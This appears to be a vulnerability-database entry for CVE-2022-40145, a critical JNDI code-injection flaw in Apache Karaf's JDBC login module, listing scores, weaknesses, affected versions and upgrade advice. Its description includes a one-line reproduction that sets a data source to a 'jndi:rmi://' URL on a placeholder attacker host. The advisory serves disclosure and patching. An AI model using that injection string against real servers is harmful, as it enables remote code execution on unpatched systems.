CVE-2022-40145

CVSS v3.1 9.8 (Critical)
98% Progress
EPSS 0.09 % (39th)
0.09% Progress
Affected Products 1
Advisories 1

This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL.

The function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource
use InitialContext.lookup(jndiName) without filtering.
An user can modify options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName()); to options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command"); in JdbcLoginModuleTest#setup.

This is vulnerable to a remote code execution (RCE) attack when a
configuration uses a JNDI LDAP data source URI when an attacker has
control of the target LDAP server.This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7.

We encourage the users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8

Weaknesses
CWE-20
Improper Input Validation
CWE-74
Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')
CWE-NVD-Other
CVE Status
PUBLISHED
CNA
Apache Software Foundation
Published Date
2022-12-21 16:15:08
(21 months ago)
Updated Date
2023-11-07 03:52:06
(10 months ago)

Affected Products

Loading...
Loading...
Loading...

Configuration #1

    CPE23 From Up To
  Apache Karaf prior 4.3.8 version cpe:2.3:a:apache:karaf < 4.3.8
  Apache Karaf from 4.4.0 version and prior 4.4.2 version cpe:2.3:a:apache:karaf >= 4.4.0 < 4.4.2
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...